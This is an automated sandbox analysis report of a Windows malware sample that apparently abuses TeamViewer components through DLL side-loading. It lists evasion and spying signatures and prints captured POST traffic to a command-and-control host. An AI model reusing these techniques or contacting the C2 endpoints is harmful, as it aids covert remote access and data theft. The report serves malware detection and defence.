Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name: wogZe27GBB (renamed file extension from none to exe)
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe ReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll ReversingLabs: Detection: 51%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.wogZe27GBB.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0049B32E __EH_prolog3,CryptGenRandom, 4_2_0049B32E
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA, 4_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_006F605B CryptReleaseContext, 4_2_006F605B

Privilege Escalation:

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Jump to behavior
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Jump to behavior
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 2_2_70982EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 2_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 4_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 4_2_70982EF0

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76426Content-Type: multipart/form-data; boundary=--------974736809User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81223Content-Type: multipart/form-data; boundary=--------1733772180User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81262Content-Type: multipart/form-data; boundary=--------3571177622User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81298Content-Type: multipart/form-data; boundary=--------3135628383User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83326Content-Type: multipart/form-data; boundary=--------2112300367User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83305Content-Type: multipart/form-data; boundary=--------1747900146User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83526Content-Type: multipart/form-data; boundary=--------4043093276User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81257Content-Type: multipart/form-data; boundary=--------4228739266User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81331Content-Type: multipart/form-data; boundary=--------3803026718User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81307Content-Type: multipart/form-data; boundary=--------2963325791User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85135Content-Type: multipart/form-data; boundary=--------2571491142User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 82926Content-Type: multipart/form-data; boundary=--------3335732562User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83052Content-Type: multipart/form-data; boundary=--------1291895716User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76682Content-Type: multipart/form-data; boundary=--------1315708494User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76660Content-Type: multipart/form-data; boundary=--------3047557173User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76627Content-Type: multipart/form-data; boundary=--------3142017803User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76637Content-Type: multipart/form-data; boundary=--------2197444700User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76633Content-Type: multipart/form-data; boundary=--------327613734User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76617Content-Type: multipart/form-data; boundary=--------3156620313User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------2353964795User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------2524520363User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76647Content-Type: multipart/form-data; boundary=--------776738021User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------1255899435User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76639Content-Type: multipart/form-data; boundary=--------3577760510User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76833Content-Type: multipart/form-data; boundary=--------4017631281User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76635Content-Type: multipart/form-data; boundary=--------3576073818User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76584Content-Type: multipart/form-data; boundary=--------2060090614User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76670Content-Type: multipart/form-data; boundary=--------1263745405User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------3327901999User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------1002864139User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76582Content-Type: multipart/form-data; boundary=--------795614568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76736Content-Type: multipart/form-data; boundary=--------572333967User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76592Content-Type: multipart/form-data; boundary=--------3756762824User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76612Content-Type: multipart/form-data; boundary=--------4010773262User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------1730318477User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76649Content-Type: multipart/form-data; boundary=--------2667398164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76622Content-Type: multipart/form-data; boundary=--------2156489369User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76630Content-Type: multipart/form-data; boundary=--------271647860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------2981659231User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76646Content-Type: multipart/form-data; boundary=--------3817058548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76655Content-Type: multipart/form-data; boundary=--------1585944860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76672Content-Type: multipart/form-data; boundary=--------1049848244User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------3157952906User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
